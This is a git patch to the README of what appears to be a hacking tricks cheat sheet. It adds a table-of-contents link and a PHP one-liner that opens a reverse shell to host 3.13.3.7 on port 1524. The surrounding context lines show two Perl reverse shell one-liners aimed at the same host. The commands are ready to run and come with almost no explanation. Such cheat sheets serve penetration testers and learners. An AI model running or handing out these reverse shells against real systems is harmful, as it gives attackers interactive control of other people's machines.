From 562edafa53273bf6edb61e341830e949c7296f5f Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 15:18:59 +0000
Subject: [PATCH] Update README.md reverse shell with PHP
---
 README.md | 7 +++++++
 1 file changed, 7 insertions(+)
diff --git a/README.md b/README.md
index f139f73..4cc599c 100644
--- a/README.md
+++ b/README.md
@@ -30,6 +30,7 @@ Got tricks? Send them to root@thc.org or submit a pull request.
 1. [without Bash](#rswob-anchor)
 1. [with Python](#rswpy-anchor)
 1. [with Perl](#rswpl-anchor)
+ 1. [with PHP](#rswphp-anchor)
 1. [Upgrading the dumb shell](#rsu-anchor)
 1. [Upgrade a reverse shell to a pty shell](#rsup-anchor)
 1. [Upgrade a reverse shell to a fully interactive shell](#rsup2-anchor)
@@ -292,6 +293,12 @@ $ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprot
 # method 2
 $ perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
 ```
+
+**5.i.e. Reverse shell with PHP**
+
+```
+php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");'
+```